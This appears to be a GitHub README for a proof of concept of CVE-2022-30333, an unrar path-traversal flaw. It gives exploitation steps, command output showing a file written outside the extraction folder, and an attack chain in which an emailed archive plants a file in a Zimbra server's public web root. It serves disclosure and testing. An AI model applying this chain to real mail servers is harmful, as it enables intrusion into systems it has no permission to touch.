Giters

TheL1ghtVn / CVE-2022-30333-PoC

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2022-30333-POC

Sample file to test CVE-2022-30333

  • Sample.rar : if you want to test on Linux. When you extract, it create trav in ../../tmp/traversed. Please be sure that directory ../../tmp/traversed exists before extracting Sample.rar

  • exp.rar : if you want to test on Zimbra Mail server. When you extract, it create moo.txt in /opt/zimbra/jetty_base/webapps/zimbra/public/. You can access this file at https://zimbra_mail_domain/public/moo.txt

EXPLOITATION STEPS

Testing on Linux

mkdir ../../tmp/traversed (the destination folder must exsist before unrar)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
"traversed"

Testing on Zimbra

  • Create an email and attach malicious rar file then send to Zimbra email address. This rar file will be extracted while being analyzed with Amavisd.
  • The moo.txt should be at: /opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt or https://zimbra_mail_domain/public/moo.txt

REFERENCES

  1. Vietnamese blog from DEV2SEC
  2. English blog from Sonarsource
  3. Special thanks to mrlihd for helping me rebuild attack-chain in Zimbra

About